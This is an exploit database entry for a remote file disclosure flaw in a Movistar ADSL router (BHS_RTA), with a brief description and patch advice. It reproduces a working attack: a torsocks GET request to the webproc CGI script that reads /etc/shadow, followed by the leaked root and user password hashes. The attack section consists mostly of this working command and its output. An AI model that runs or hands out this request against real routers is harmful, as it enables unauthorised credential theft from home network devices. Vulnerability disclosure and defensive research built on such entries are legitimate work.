header-logo
Suggest Exploit
vendor:
BHS_RTA
by:
Todor Donev
8,8
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: BHS_RTA
Affected Version From: BHS_RTA_CO_019
Affected Version To: BHS_RTA_CO_019
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

MOVISTAR ADSL ROUTER BHS_RTA BHS_RTA_C0_019 Remote File Disclosure

A vulnerability in the MOVISTAR ADSL ROUTER BHS_RTA BHS_RTA_C0_019 allows an attacker to remotely access the /etc/shadow file, which contains the encrypted passwords of all users on the system. By sending a specially crafted GET request to the webproc CGI script, an attacker can view the contents of the /etc/shadow file.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their systems to the latest version of the firmware.
Source

Exploit-DB raw data:

#!/bin/sh
# 
#  MOVISTAR ADSL ROUTER BHS_RTA BHS_RTA_C0_019
#  Remote File Disclosure
#
#  Vendor:              OBSERVA
#  Model:               BHS_RTA
#  Software:            BHS_RTA_CO_019
#  Firmware:            09/08/2012-10:23:25  
# 
#
#  Copyright 2016 (c) Todor Donev 
#  <todor.donev at gmail.com>
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  Thanks to Maya Hristova that support me.  

[todor@adamantium ~]$ torsocks GET "http://TARGET/cgi-bin/webproc?getpage=/etc/shadow&var:language=es_es&var:page="
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

Navigation

Suggest Exploit

Services By CQR